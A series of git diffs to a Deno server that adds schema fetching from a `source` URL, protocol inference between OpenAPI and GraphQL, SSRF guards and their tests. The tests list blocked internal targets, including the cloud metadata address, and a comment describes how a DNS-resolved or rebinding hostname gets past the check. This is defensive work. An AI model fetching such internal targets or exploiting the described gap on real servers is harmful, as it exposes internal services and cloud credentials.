-  protocol: v.literal("gql"),
-  schema: v.string(),
-  clientSettings: v.optional(settingsSchema),
-  /** Schema source identifier stamped onto each sidecar's `src` field.
-   *  Optional — defaults to the protocol name. */
-  schemaSrc: v.optional(v.string()),
-});
-
-/**
- * Discriminated request body for `POST /artifacts`, `POST /subjects` and
- * `POST /enrichment-defaults`. `v.variant` keys on `protocol` and routes to the
- * matching variant — clients must send `protocol: 'oas'` or `protocol: 'gql'`
- * explicitly. After parsing, the result is a properly-narrowed discriminated
- * union.
- */
-export const postArtifactsBody = v.variant("protocol", [
-  oasArtifactsBody,
-  gqlArtifactsBody,
-]);
+export const postArtifactsBody = v.pipe(
+  v.object({
+    protocol: v.optional(protocolSchema),
+    schema: v.optional(v.pipe(
+      v.string(),
+      v.description("The schema document itself, as a string."),
+    )),
+    source: v.optional(sourceSchema),
+    clientSettings: v.optional(settingsSchema),
+    /** Schema source identifier stamped onto each sidecar's `src` field
+     *  (e.g. `'openapi.json'`). Optional — defaults to the resolved `source`
+     *  URL when one was fetched, else to the protocol name. */
+    schemaSrc: v.optional(v.string()),
+  }),
+  v.check(
+    (body) => (body.schema === undefined) !== (body.source === undefined),
+    EXACTLY_ONE_MESSAGE,
+  ),
+);
 
 export type ArtifactsBody = v.InferOutput<typeof postArtifactsBody>;
 
@@ -57,5 +73,17 @@ export const validateBody = v.object({
   clientSettings: v.optional(settingsSchema),
 });
 
-/** Body for `POST /to-v3-json` — a raw OpenAPI/Swagger document to normalize. */
-export const toV3JsonBody = v.object({ schema: v.string() });
+/** Body for `POST /to-v3-json` — a raw OpenAPI/Swagger document to normalize,
+ *  inline (`schema`) or fetched from a URL (`source`). */
+export const toV3JsonBody = v.pipe(
+  v.object({
+    schema: v.optional(v.string()),
+    source: v.optional(sourceSchema),
+  }),
+  v.check(
+    (body) => (body.schema === undefined) !== (body.source === undefined),
+    EXACTLY_ONE_MESSAGE,
+  ),
+);
+
+export type ToV3JsonBody = v.InferOutput<typeof toV3JsonBody>;

--- a/deno/server/src/schemaInput.test.ts
+++ b/deno/server/src/schemaInput.test.ts
@@ -1,10 +1,12 @@
 import {
   assertEquals,
   assertRejects,
+  assertStrictEquals,
   assertStringIncludes,
   assertThrows,
 } from "@std/assert";
 import {
+  assertSdlReadable,
   fetchSource,
   inferProtocol,
   SchemaReadError,
@@ -47,6 +49,24 @@ const UNREADABLE_DOCUMENTS: [string, string][] = [
   ["bad indent yaml", "openapi: 3.0.0\ninfo:\n  title: x\n   bad: y"],
   ["empty", "   "],
   ["prose", "Not found. Please sign in to view this schema."],
+  // YAML block scalars carry prose, and a wrapped line can open with an SDL
+  // keyword and whitespace. Matching keyword-plus-whitespace alone sent these
+  // to the GraphQL parser — the first below even announces itself as OAS on
+  // line 1 and still came back as a GraphQL syntax error.
+  [
+    "truncated oas yaml whose prose opens with `schema `",
+    "openapi: 3.0.0\ninfo:\n  description: >\n    schema defined in " +
+    "components.\n  title: x\n   bad: y",
+  ],
+  [
+    "components-only yaml whose prose opens with `type `",
+    "components:\n  schemas:\n    Widget:\n      description: >\n" +
+    "        type of widget is not yet decided.\n",
+  ],
+  [
+    "prose opening with `interface `",
+    "interface not available. Sign in to view this schema.",
+  ],
 ];
 
 Deno.test("inferProtocol - reads GraphQL SDL as gql", () => {
@@ -67,22 +87,74 @@ Deno.test("inferProtocol - refuses a document that is neither", () => {
   }
 });
 
+Deno.test("inferProtocol - an unparseable document announcing `openapi:` names the YAML failure", () => {
+  // Not just "a 422": the reason has to name the real problem. Classified as
+  // SDL, this reported a GraphQL syntax error about a document whose first
+  // line says it is OpenAPI.
+  const error = assertThrows(
+    () =>
+      inferProtocol(
+        "openapi: 3.0.0\ninfo:\n  description: >\n    type of widget is " +
+          "unclear\n  title: x\n   bad: y",
+      ),
+    SchemaReadError,
+  );
+  assertStringIncludes(error.message, "Could not read the document");
+});
+
+Deno.test("assertSdlReadable - accepts every SDL document", () => {
+  for (const [label, document] of SDL_DOCUMENTS) {
+    assertSdlReadable(document);
+    assertEquals(inferProtocol(document), "gql", label);
+  }
+});
+
+Deno.test("assertSdlReadable - refuses a document carrying no SDL definition", () => {
+  // The gate an explicit `protocol: "gql"` has to clear too, so passing the
+  // protocol is not a way past the readability contract.
+  for (const [label, document] of UNREADABLE_DOCUMENTS) {
+    assertThrows(() => assertSdlReadable(document), SchemaReadError, undefined, label);
+  }
+});
+
 /** `fetchSource` with `globalThis.fetch` replaced, so no test touches the
  *  network — a blocked URL must fail before `fetch` is reached at all. */
 const withStubbedFetch = async (
-  stub: (input: URL | RequestInfo) => Response,
+  stub: (input: URL | RequestInfo, init?: RequestInit) => Response,
   body: () => Promise<void>,
 ) => {
   const original = globalThis.fetch;
   globalThis.fetch =
-    ((input: URL | RequestInfo) =>
-      Promise.resolve(stub(input))) as typeof fetch;
+    ((input: URL | RequestInfo, init?: RequestInit) =>
+      Promise.resolve(stub(input, init))) as typeof fetch;
   try {
     await body();
   } finally {
     globalThis.fetch = original;
   }
 };
+
+Deno.test("fetchSource - spends one timeout budget across every redirect hop", async () => {
+  const signals: (AbortSignal | null | undefined)[] = [];
+  await withStubbedFetch(
+    (input, init) => {
+      signals.push(init?.signal);
+      return String(input) === "https://example.com/a"
+        ? new Response(null, { status: 302, headers: { location: "/b" } })
+        : new Response('{"openapi": "3.0.0"}', { status: 200 });
+    },
+    async () => {
+      await fetchSource("https://example.com/a");
+
+      // Built per hop, the documented 10s budget would really be 10s × hops,
+      // so a slow chain could hold a request open far past the limit the
+      // `source` description advertises. One signal, threaded, is the fix.
+      assertEquals(signals.length, 2);
+      assertEquals(signals[0] instanceof AbortSignal, true);
+      assertStrictEquals(signals[0], signals[1]);
+    },
+  );
+});
 
 /** Loopback, RFC1918, carrier-grade NAT, link-local (cloud metadata),
  *  unique-local, IPv4-mapped loopback, and private-by-convention names —

--- a/deno/server/src/schemaInput.test.ts
+++ b/deno/server/src/schemaInput.test.ts
@@ -1,5 +1,71 @@
-import { assertEquals, assertRejects, assertStringIncludes } from "@std/assert";
-import { fetchSource, SourceFetchError } from "./schemaInput.ts";
+import {
+  assertEquals,
+  assertRejects,
+  assertStringIncludes,
+  assertThrows,
+} from "@std/assert";
+import {
+  fetchSource,
+  inferProtocol,
+  SchemaReadError,
+  SourceFetchError,
+} from "./schemaInput.ts";
+
+/** SDL a caller can plausibly post. `type Query { a: Int }` on one line reads
+ *  as a YAML mapping, and a field named `openapi` fails the YAML parse — so
+ *  neither "it parsed" nor "it threw" can decide the protocol on its own. */
+const SDL_DOCUMENTS: [string, string][] = [
+  ["multi-line", "type Query {\n  a: Int\n}\n"],
+  ["single line", "type Query { a: Int }"],
+  ["field named openapi", "type Query {\n  openapi: String\n  a: Int\n}\n"],
+  ["field named swagger", "type Query {\n  swagger: String\n}\n"],
+  ["leading comment", "# The API\ntype Query {\n  a: Int\n}\n"],
+  ["leading docstring", '"""The API"""\ntype Query {\n  a: Int\n}\n'],
+  ["schema block", "schema {\n  query: Query\n}\ntype Query { a: Int }"],
+  ["enum and input", "enum Role { ADMIN }\ninput Filter { q: String }"],
+  ["scalar", "scalar DateTime\ntype Query { at: DateTime }"],
+  ["directive", "directive @auth on FIELD_DEFINITION\ntype Query { a: Int }"],
+  ["interface", "interface Node {\n  id: ID!\n}\n"],
+  ["extension", "extend type Query {\n  b: Int\n}\n"],
+  ["indented", "\n  type Query {\n    ping: Boolean\n  }\n"],
+];
+
+const OAS_DOCUMENTS: [string, string][] = [
+  ["json 3.0", '{"openapi": "3.0.0", "info": {}, "paths": {}}'],
+  ["yaml 3.0", "openapi: 3.0.0\ninfo:\n  title: x\npaths: {}\n"],
+  ["swagger 2.0", '{"swagger": "2.0", "info": {}, "paths": {}}'],
+  ["yaml swagger 2.0", "swagger: '2.0'\ninfo:\n  title: x\n"],
+];
+
+/** Documents that are neither protocol. Each used to be handed to the
+ *  GraphQL parser, which could only report that they are not SDL. */
+const UNREADABLE_DOCUMENTS: [string, string][] = [
+  ["html error page", "<!doctype html><html><body>404</body></html>"],
+  ["json without a version key", '{"paths": {"/a": {}}, "info": {}}'],
+  ["yaml without a version key", "info:\n  title: x\npaths: {}\n"],
+  ["truncated json", '{"openapi": "3.0.0", "info": {'],
+  ["bad indent yaml", "openapi: 3.0.0\ninfo:\n  title: x\n   bad: y"],
+  ["empty", "   "],
+  ["prose", "Not found. Please sign in to view this schema."],
+];
+
+Deno.test("inferProtocol - reads GraphQL SDL as gql", () => {
+  for (const [label, document] of SDL_DOCUMENTS) {
+    assertEquals(inferProtocol(document), "gql", label);
+  }
+});
+
+Deno.test("inferProtocol - reads an OpenAPI document as oas", () => {
+  for (const [label, document] of OAS_DOCUMENTS) {
+    assertEquals(inferProtocol(document), "oas", label);
+  }
+});
+
+Deno.test("inferProtocol - refuses a document that is neither", () => {
+  for (const [label, document] of UNREADABLE_DOCUMENTS) {
+    assertThrows(() => inferProtocol(document), SchemaReadError, undefined, label);
+  }
+});
 
 /** `fetchSource` with `globalThis.fetch` replaced, so no test touches the
  *  network — a blocked URL must fail before `fetch` is reached at all. */
@@ -35,6 +101,14 @@ const PRIVATE_URLS = [
   "http://[fe80::1]/x",
   "http://build.internal/openapi.json",
   "http://printer.local/openapi.json",
+  // Fully-qualified forms: `URL` keeps the trailing dot, and `localhost.`
+  // resolves exactly where `localhost` does.
+  "http://localhost./x",
+  "http://localhost.:8080/admin",
+  "http://build.internal./openapi.json",
+  "http://printer.local./openapi.json",
+  // `URL` lowercases the host, so the check sees one casing.
+  "http://LOCALHOST/x",
 ];
 
 Deno.test("fetchSource - refuses a private target without reaching fetch", async () => {

--- a/deno/server/src/schemaInput.test.ts
+++ b/deno/server/src/schemaInput.test.ts
@@ -1,0 +1,84 @@
+import { assertEquals, assertRejects, assertStringIncludes } from "@std/assert";
+import { fetchSource, SourceFetchError } from "./schemaInput.ts";
+
+/** `fetchSource` with `globalThis.fetch` replaced, so no test touches the
+ *  network — a blocked URL must fail before `fetch` is reached at all. */
+const withStubbedFetch = async (
+  stub: (input: URL | RequestInfo) => Response,
+  body: () => Promise<void>,
+) => {
+  const original = globalThis.fetch;
+  globalThis.fetch =
+    ((input: URL | RequestInfo) =>
+      Promise.resolve(stub(input))) as typeof fetch;
+  try {
+    await body();
+  } finally {
+    globalThis.fetch = original;
+  }
+};
+
+/** Loopback, RFC1918, carrier-grade NAT, link-local (cloud metadata),
+ *  unique-local, IPv4-mapped loopback, and private-by-convention names —
+ *  in both the literal and bracketed IPv6 forms a caller can write. */
+const PRIVATE_URLS = [
+  "http://localhost:8080/internal/config",
+  "http://127.0.0.1/x",
+  "http://10.0.0.1/x",
+  "http://172.16.4.4/x",
+  "http://192.168.1.1/x",
+  "http://100.64.0.1/x",
+  "http://169.254.169.254/latest/meta-data/",
+  "http://[::1]:9000/x",
+  "http://[::ffff:127.0.0.1]/x",
+  "http://[fd00::1]/x",
+  "http://[fe80::1]/x",
+  "http://build.internal/openapi.json",
+  "http://printer.local/openapi.json",
+];
+
+Deno.test("fetchSource - refuses a private target without reaching fetch", async () => {
+  await withStubbedFetch(
+    () => {
+      throw new Error("fetch must not be attempted");
+    },
+    async () => {
+      for (const url of PRIVATE_URLS) {
+        const error = await assertRejects(
+          () => fetchSource(url),
+          SourceFetchError,
+        );
+        assertStringIncludes(error.message, "private address");
+      }
+    },
+  );
+});
+
+Deno.test("fetchSource - fetches a public target", async () => {
+  await withStubbedFetch(
+    () => new Response("{}", { status: 200 }),
+    async () => {
+      for (const url of ["https://example.com/x", "http://[2606:4700::1]/x"]) {
+        const { schema } = await fetchSource(url);
+        assertEquals(schema, "{}");
+      }
+    },
+  );
+});
+
+Deno.test("fetchSource - stops after the redirect limit", async () => {
+  await withStubbedFetch(
+    () =>
+      new Response(null, {
+        status: 302,
+        headers: { location: "https://example.com/again" },
+      }),
+    async () => {
+      const error = await assertRejects(
+        () => fetchSource("https://example.com/start"),
+        SourceFetchError,
+      );
+      assertStringIncludes(error.message, "redirects");
+    },
+  );
+});

--- a/deno/server/src/schemaInput.ts
+++ b/deno/server/src/schemaInput.ts
@@ -1,0 +1,165 @@
+import { encodeHex } from "@std/encoding/hex";
+import { stringToSchema } from "@skmtc/convert";
+import type { ArtifactsBody } from "./requestSchemas.ts";
+
+/**
+ * Resolving a request's schema input: the caller sends exactly one of an
+ * inline `schema` string or a `source` URL, with `protocol` optional. This
+ * module turns that into a definite `{ protocol, schema }` pair — fetching
+ * the source when given one — and reports failures as typed errors the
+ * server's error handler maps to structured 4xx responses.
+ */
+
+/** The `source` URL could not be fetched (network failure, non-2xx, timeout,
+ *  or an oversized response). Maps to a structured 422. */
+export class SourceFetchError extends Error {
+  override name = "SourceFetchError";
+}
+
+/** The schema document could not be read at all — not valid JSON/YAML on the
+ *  `oas` path. (Distinct from a document that parses but has issues: those
+ *  return 200 with `manifest.parseIssues`.) Maps to a structured 422. */
+export class SchemaReadError extends Error {
+  override name = "SchemaReadError";
+}
+
+/** Echo of a fetched `source`, returned alongside the artifacts so a caller
+ *  can reproduce the run. */
+export type ResolvedSource = {
+  /** The URL as requested. */
+  url: string;
+  /** The final URL after redirects — when the source redirects to a pinned,
+   *  content-addressed form, this is the URL to keep. */
+  resolvedUrl: string;
+  /** `sha256:<hex>` digest of the fetched bytes, before any normalization. */
+  digest: string;
+};
+
+export type ResolvedSchemaInput = {
+  protocol: "oas" | "gql";
+  /** The schema document text, inline from the request or fetched. */
+  schema: string;
+  /** Present when the input came from a `source` URL. */
+  source?: ResolvedSource;
+};
+
+const FETCH_TIMEOUT_MS = 10_000;
+const MAX_SOURCE_BYTES = 20 * 1024 * 1024;
+
+/**
+ * Infer the protocol from document content: a JSON/YAML document carrying an
+ * `openapi` or `swagger` key is OAS; anything else is treated as GraphQL SDL
+ * (whose parse issues, if any, surface through the normal gql parse path).
+ */
+export const inferProtocol = (schema: string): "oas" | "gql" => {
+  try {
+    const document = stringToSchema(schema);
+    if (
+      document !== null && typeof document === "object" &&
+      ("openapi" in document || "swagger" in document)
+    ) {
+      return "oas";
+    }
+  } catch {
+    // Not JSON/YAML — fall through to SDL.
+  }
+  return "gql";
+};
+
+const toDigest = async (bytes: Uint8Array<ArrayBuffer>): Promise<string> => {
+  const hash = await crypto.subtle.digest("SHA-256", bytes);
+  return `sha256:${encodeHex(new Uint8Array(hash))}`;
+};
+
+/** Read a response body with a hard size cap, so a huge (or endless) source
+ *  fails cleanly instead of exhausting memory. */
+const readCapped = async (
+  response: Response,
+  url: string,
+): Promise<Uint8Array<ArrayBuffer>> => {
+  const declared = Number(response.headers.get("content-length") ?? "0");
+  if (declared > MAX_SOURCE_BYTES) {
+    await response.body?.cancel();
+    throw new SourceFetchError(
+      `Source ${url} is ${declared} bytes; the limit is ${MAX_SOURCE_BYTES}.`,
+    );
+  }
+  if (response.body === null) return new Uint8Array(0);
+
+  const chunks: Uint8Array[] = [];
+  let total = 0;
+  for await (const chunk of response.body) {
+    total += chunk.byteLength;
+    if (total > MAX_SOURCE_BYTES) {
+      await response.body.cancel();
+      throw new SourceFetchError(
+        `Source ${url} exceeds the ${MAX_SOURCE_BYTES}-byte limit.`,
+      );
+    }
+    chunks.push(chunk);
+  }
+  const bytes = new Uint8Array(total);
+  let offset = 0;
+  for (const chunk of chunks) {
+    bytes.set(chunk, offset);
+    offset += chunk.byteLength;
+  }
+  return bytes;
+};
+
+/** Fetch a `source` URL: follow redirects, enforce a timeout and size cap,
+ *  and report the final URL + content digest. */
+export const fetchSource = async (
+  url: string,
+): Promise<{ schema: string; source: ResolvedSource }> => {
+  let response: Response;
+  try {
+    response = await fetch(url, {
+      signal: AbortSignal.timeout(FETCH_TIMEOUT_MS),
+      redirect: "follow",
+    });
+  } catch (error) {
+    const reason = error instanceof Error ? error.message : String(error);
+    throw new SourceFetchError(`Could not fetch source ${url}: ${reason}`);
+  }
+  if (!response.ok) {
+    await response.body?.cancel();
+    throw new SourceFetchError(
+      `Source ${url} returned ${response.status} ${response.statusText}`.trim(),
+    );
+  }
+  const bytes = await readCapped(response, url);
+  return {
+    schema: new TextDecoder().decode(bytes),
+    source: {
+      url,
+      // A constructed Response (tests, some proxies) has an empty `url`;
+      // fall back to the requested one.
+      resolvedUrl: response.url === "" ? url : response.url,
+      digest: await toDigest(bytes),
+    },
+  };
+};
+
+/**
+ * Resolve a validated request body to a definite schema input: fetch the
+ * `source` if one was given, then infer the protocol unless it was passed
+ * explicitly.
+ */
+export const resolveSchemaInput = async (
+  body: Pick<ArtifactsBody, "protocol" | "schema" | "source">,
+): Promise<ResolvedSchemaInput> => {
+  const fetched = body.source !== undefined
+    ? await fetchSource(body.source)
+    : undefined;
+  const schema = fetched?.schema ?? body.schema;
+  if (schema === undefined) {
+    // Unreachable behind the request schema's exactly-one check.
+    throw new SchemaReadError("No schema input provided.");
+  }
+  return {
+    protocol: body.protocol ?? inferProtocol(schema),
+    schema,
+    ...(fetched !== undefined ? { source: fetched.source } : {}),
+  };
+};

--- a/deno/server/src/schemaInput.ts
+++ b/deno/server/src/schemaInput.ts
@@ -47,19 +47,49 @@ const FETCH_TIMEOUT_MS = 10_000;
 const MAX_SOURCE_BYTES = 20 * 1024 * 1024;
 const MAX_REDIRECTS = 5;
 
+/** A GraphQL Name, as the spec defines it. */
+const NAME = "[_A-Za-z][_0-9A-Za-z]*";
+
 /**
- * Does this text carry a GraphQL SDL definition? Every SDL keyword that can
- * open a definition, followed by whitespace — which is what separates SDL's
- * `type Query {` from YAML's `type: string`.
+ * Does this text carry a GraphQL SDL definition? Each alternative is a
+ * definition keyword, its name, and the token that must follow — `{`, `@`,
+ * `implements`, `=`. Keyword-plus-whitespace alone is not enough: YAML block
+ * scalars carry ordinary prose, and a wrapped line reading `type of widget
+ * is ...` or `schema defined in components.` opens with exactly that shape.
  *
  * This is a POSITIVE test, deliberately: gql is not the fallthrough for
  * "everything that isn't OpenAPI". An HTML error page and a JSON document
  * with no `openapi` key are neither protocol, and saying so beats handing
  * them to the GraphQL parser and reporting its syntax error.
  */
-const looksLikeSdl = (schema: string): boolean =>
-  /^[ \t]*(type|interface|enum|union|input|scalar|schema|directive|extend)[ \t]+/m
-    .test(schema);
+const SDL_DEFINITION = new RegExp(
+  [
+    // `type Foo {`, `type Foo implements Bar`, `type Foo @dir`
+    `(?:type|interface|input)[ \\t]+${NAME}[ \\t]*(?:\\{|@|implements[ \\t])`,
+    // `enum Foo {`, `enum Foo @dir`
+    `enum[ \\t]+${NAME}[ \\t]*(?:\\{|@)`,
+    // `union Foo = A | B`
+    `union[ \\t]+${NAME}[ \\t]*(?:=|@)`,
+    // `scalar Foo` — nothing but a directive may follow on the line
+    `scalar[ \\t]+${NAME}[ \\t]*(?:@|$)`,
+    // `schema {`, `schema @dir {`
+    `schema[ \\t]*(?:\\{|@)`,
+    // `directive @foo on FIELD_DEFINITION`
+    `directive[ \\t]*@`,
+  ].map((definition) => `^[ \\t]*(?:extend[ \\t]+)?(?:${definition})`).join("|"),
+  "m",
+);
+
+const looksLikeSdl = (schema: string): boolean => SDL_DEFINITION.test(schema);
+
+/**
+ * Does this text announce itself as an OpenAPI document? Anchored at column
+ * 0, where an OAS document carries its version key. Indented, the same text
+ * is a nested mapping key or an SDL field named `openapi` — neither of which
+ * is the header.
+ */
+const announcesOas = (schema: string): boolean =>
+  /^(?:openapi|swagger)[ \t]*:/m.test(schema);
 
 type ParseOutcome =
   /** Read as a JSON/YAML mapping — the shape an OAS document has. */
@@ -105,7 +135,11 @@ export const inferProtocol = (schema: string): "oas" | "gql" => {
   ) {
     return "oas";
   }
-  if (looksLikeSdl(schema)) return "gql";
+  // A document that announces itself as OAS on line 1 and then fails to parse
+  // is a broken OAS document, not SDL. Reporting the YAML failure names the
+  // problem; running it through the GraphQL parser reports the wrong language.
+  const brokenOas = outcome.kind === "unreadable" && announcesOas(schema);
+  if (!brokenOas && looksLikeSdl(schema)) return "gql";
   throw new SchemaReadError(
     outcome.kind === "unreadable"
       ? `Could not read the document as JSON or YAML: ${outcome.reason}. ` +
@@ -113,6 +147,30 @@ export const inferProtocol = (schema: string): "oas" | "gql" => {
       : "The document is neither an OpenAPI document (no `openapi` or " +
         "`swagger` key) nor GraphQL SDL.",
   );
+};
+
+/**
+ * Reject a document routed to the GraphQL parser that carries no SDL
+ * definition at all — so an explicit `protocol: "gql"` gets the same 422 that
+ * inferring the protocol would give. Without this, passing `protocol` is a
+ * way around the readability contract: an HTML sign-in page comes back 200
+ * with a GraphQL syntax error about `<`.
+ *
+ * A document that IS SDL but has syntax errors stays a 200 with
+ * `manifest.parseIssues`. Unreadable and "readable but wrong" are different
+ * answers, and only the first is a 422.
+ */
+export const assertSdlReadable = (schema: string): void => {
+  if (schema.trim() === "") {
+    throw new SchemaReadError("The schema document is empty.");
+  }
+  if (!looksLikeSdl(schema)) {
+    throw new SchemaReadError(
+      "The document contains no GraphQL SDL definition (`type`, " +
+        "`interface`, `enum`, `union`, `input`, `scalar`, `schema` or " +
+        "`directive`).",
+    );
+  }
 };
 
 const toDigest = async (bytes: Uint8Array<ArrayBuffer>): Promise<string> => {
@@ -234,8 +292,19 @@ const isPrivateName = (hostname: string): boolean => {
  *
  * Checked per redirect hop, not just on the requested URL: `redirect:
  * "follow"` would hand a public-looking URL a free hop to an internal one.
- * A hostname that RESOLVES to a private address is not covered — that needs
- * DNS resolution the deployment target does not guarantee.
+ *
+ * WHAT THIS DOES NOT COVER: only the literal hostname is inspected, so a
+ * public name with a private A record (`schema.example.com` → 169.254.169.254)
+ * passes and is fetched — and because the body becomes the schema and the
+ * status is echoed in the 422, the endpoint reads back what it fetched rather
+ * than merely reaching it. Resolving the name first would not settle it
+ * either: DNS rebinding defeats a pre-flight resolution unless the resolved
+ * address is pinned for the connection, which `fetch` does not expose.
+ *
+ * So network isolation, not this function, is the control that has to hold —
+ * see "Network isolation" in `docs/reference/cli/publish.md`. Anyone running
+ * a stack server outside an isolated runtime needs an egress policy in front
+ * of it; this check alone is not one.
  */
 const toFetchableUrl = (url: string): URL => {
   const parsed = new URL(url);
@@ -268,12 +337,10 @@ const REDIRECT_STATUSES = new Set([301, 302, 303, 307, 308]);
 const fetchFollowing = async (
   url: string,
   hopsLeft: number,
+  signal: AbortSignal,
 ): Promise<{ response: Response; resolvedUrl: string }> => {
   const target = toFetchableUrl(url);
-  const response = await fetch(target, {
-    signal: AbortSignal.timeout(FETCH_TIMEOUT_MS),
-    redirect: "manual",
-  });
+  const response = await fetch(target, { signal, redirect: "manual" });
   const location = response.headers.get("location");
   if (!REDIRECT_STATUSES.has(response.status) || location === null) {
     return { response, resolvedUrl: target.href };
@@ -284,16 +351,23 @@ const fetchFollowing = async (
       `Source ${url} exceeded ${MAX_REDIRECTS} redirects.`,
     );
   }
-  return fetchFollowing(new URL(location, target).href, hopsLeft - 1);
+  return fetchFollowing(new URL(location, target).href, hopsLeft - 1, signal);
 };
 
 /** `fetchFollowing`, with any network-level failure (DNS, refused connect,
- *  connect timeout) reported as a `SourceFetchError`. */
+ *  connect timeout) reported as a `SourceFetchError`.
+ *
+ *  The timeout is created here, once, and threaded through every redirect
+ *  hop and the body read — so `FETCH_TIMEOUT_MS` is the budget for the whole
+ *  fetch, not per hop. Created per hop it would let a source that emits the
+ *  maximum redirects hold the request open for `MAX_REDIRECTS + 1` times as
+ *  long as the documented limit. */
 const fetchChecked = async (
   url: string,
+  signal: AbortSignal,
 ): Promise<{ response: Response; resolvedUrl: string }> => {
   try {
-    return await fetchFollowing(url, MAX_REDIRECTS);
+    return await fetchFollowing(url, MAX_REDIRECTS, signal);
   } catch (error) {
     if (error instanceof SourceFetchError) throw error;
     const reason = error instanceof Error ? error.message : String(error);
@@ -306,7 +380,8 @@ const fetchChecked = async (
 export const fetchSource = async (
   url: string,
 ): Promise<{ schema: string; source: ResolvedSource }> => {
-  const { response, resolvedUrl } = await fetchChecked(url);
+  const signal = AbortSignal.timeout(FETCH_TIMEOUT_MS);
+  const { response, resolvedUrl } = await fetchChecked(url, signal);
 
   if (!response.ok) {
     await response.body?.cancel();

--- a/deno/server/src/schemaInput.ts
+++ b/deno/server/src/schemaInput.ts
@@ -45,13 +45,33 @@ export type ResolvedSchemaInput = {
 
 const FETCH_TIMEOUT_MS = 10_000;
 const MAX_SOURCE_BYTES = 20 * 1024 * 1024;
+const MAX_REDIRECTS = 5;
+
+/**
+ * Does this text present itself as a JSON/YAML document rather than GraphQL
+ * SDL? A leading `{` is JSON; an `openapi:` / `swagger:` key line is YAML
+ * OpenAPI. When such a document fails to parse, the input is a broken OAS
+ * document — NOT SDL — so the failure must surface rather than be reclassified.
+ */
+const looksLikeOasDocument = (schema: string): boolean =>
+  schema.trimStart().startsWith("{") ||
+  /^[ \t]*(openapi|swagger)[ \t]*:/m.test(schema);
 
 /**
  * Infer the protocol from document content: a JSON/YAML document carrying an
  * `openapi` or `swagger` key is OAS; anything else is treated as GraphQL SDL
  * (whose parse issues, if any, surface through the normal gql parse path).
+ *
+ * A document that announces itself as OAS but cannot be parsed raises
+ * `SchemaReadError` (→ 422) instead of falling through to SDL — otherwise a
+ * truncated OpenAPI document, an HTML error page returned by a `source` URL,
+ * or an empty response comes back as 200 with a GraphQL syntax error, which
+ * names the wrong problem.
  */
 export const inferProtocol = (schema: string): "oas" | "gql" => {
+  if (schema.trim() === "") {
+    throw new SchemaReadError("The schema document is empty.");
+  }
   try {
     const document = stringToSchema(schema);
     if (
@@ -60,7 +80,11 @@ export const inferProtocol = (schema: string): "oas" | "gql" => {
     ) {
       return "oas";
     }
-  } catch {
+  } catch (error) {
+    if (looksLikeOasDocument(schema)) {
+      const reason = error instanceof Error ? error.message : String(error);
+      throw new SchemaReadError(`Could not read OAS document: ${reason}`);
+    }
     // Not JSON/YAML — fall through to SDL.
   }
   return "gql";
@@ -72,7 +96,11 @@ const toDigest = async (bytes: Uint8Array<ArrayBuffer>): Promise<string> => {
 };
 
 /** Read a response body with a hard size cap, so a huge (or endless) source
- *  fails cleanly instead of exhausting memory. */
+ *  fails cleanly instead of exhausting memory.
+ *
+ *  The body is drained through an explicit reader rather than `for await`:
+ *  the loop's implicit reader locks the stream, and cancelling a locked
+ *  stream throws `TypeError`, which would turn the size-cap 422 into a 500. */
 const readCapped = async (
   response: Response,
   url: string,
@@ -86,17 +114,20 @@ const readCapped = async (
   }
   if (response.body === null) return new Uint8Array(0);
 
+  const reader = response.body.getReader();
   const chunks: Uint8Array[] = [];
   let total = 0;
-  for await (const chunk of response.body) {
-    total += chunk.byteLength;
+  while (true) {
+    const { done, value } = await reader.read();
+    if (done) break;
+    total += value.byteLength;
     if (total > MAX_SOURCE_BYTES) {
-      await response.body.cancel();
+      await reader.cancel();
       throw new SourceFetchError(
         `Source ${url} exceeds the ${MAX_SOURCE_BYTES}-byte limit.`,
       );
     }
-    chunks.push(chunk);
+    chunks.push(value);
   }
   const bytes = new Uint8Array(total);
   let offset = 0;
@@ -107,37 +138,156 @@ const readCapped = async (
   return bytes;
 };
 
+/** Drain the body, reporting a mid-stream failure — the read timing out,
+ *  the connection resetting — as the same `SourceFetchError` a failed
+ *  connect produces. `fetch` resolves once headers arrive, so without this
+ *  everything that goes wrong while reading escapes as a 500. */
+const readSourceBody = async (
+  response: Response,
+  url: string,
+): Promise<Uint8Array<ArrayBuffer>> => {
+  try {
+    return await readCapped(response, url);
+  } catch (error) {
+    if (error instanceof SourceFetchError) throw error;
+    const reason = error instanceof Error ? error.message : String(error);
+    throw new SourceFetchError(`Could not read source ${url}: ${reason}`);
+  }
+};
+
+const IPV4_PATTERN = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;
+
+/** Loopback, private (RFC1918), carrier-grade NAT, link-local (which is
+ *  where cloud metadata services live) and "this network". */
+const isPrivateIpv4 = (hostname: string): boolean => {
+  const match = IPV4_PATTERN.exec(hostname);
+  if (match === null) return false;
+  const [first, second] = match.slice(1).map(Number);
+  return first === 0 || first === 10 || first === 127 ||
+    (first === 169 && second === 254) ||
+    (first === 172 && second >= 16 && second <= 31) ||
+    (first === 192 && second === 168) ||
+    (first === 100 && second >= 64 && second <= 127);
+};
+
+/** Loopback / unspecified, unique-local (`fc00::/7`), link-local
+ *  (`fe80::/10`), plus IPv4-mapped forms of the blocked v4 ranges. */
+const isPrivateIpv6 = (hostname: string): boolean => {
+  if (!hostname.includes(":")) return false;
+  const mapped = /^::ffff:(.+)$/.exec(hostname);
+  if (mapped !== null) {
+    const [high, low] = mapped[1].split(":");
+    const dotted = low === undefined ? mapped[1] : [
+      parseInt(high, 16) >> 8,
+      parseInt(high, 16) & 0xff,
+      parseInt(low, 16) >> 8,
+      parseInt(low, 16) & 0xff,
+    ].join(".");
+    return isPrivateIpv4(dotted);
+  }
+  return hostname === "::1" || hostname === "::" ||
+    /^f[cd]/.test(hostname) || /^fe[89ab]/.test(hostname);
+};
+
+/** Names that resolve inside a private network by convention. */
+const isPrivateName = (hostname: string): boolean =>
+  hostname === "localhost" ||
+  [".localhost", ".local", ".internal"].some((suffix) =>
+    hostname.endsWith(suffix)
+  );
+
+/**
+ * Reject a `source` that points at the deployment's own network rather than
+ * a public schema. Deno subhosting already isolates a stack server from any
+ * internal network, so this is defence in depth — but it also keeps the
+ * error honest (a private target names itself) and holds if the same server
+ * is ever run somewhere less isolated.
+ *
+ * Checked per redirect hop, not just on the requested URL: `redirect:
+ * "follow"` would hand a public-looking URL a free hop to an internal one.
+ * A hostname that RESOLVES to a private address is not covered — that needs
+ * DNS resolution the deployment target does not guarantee.
+ */
+const toFetchableUrl = (url: string): URL => {
+  const parsed = new URL(url);
+  if (parsed.protocol !== "http:" && parsed.protocol !== "https:") {
+    throw new SourceFetchError(
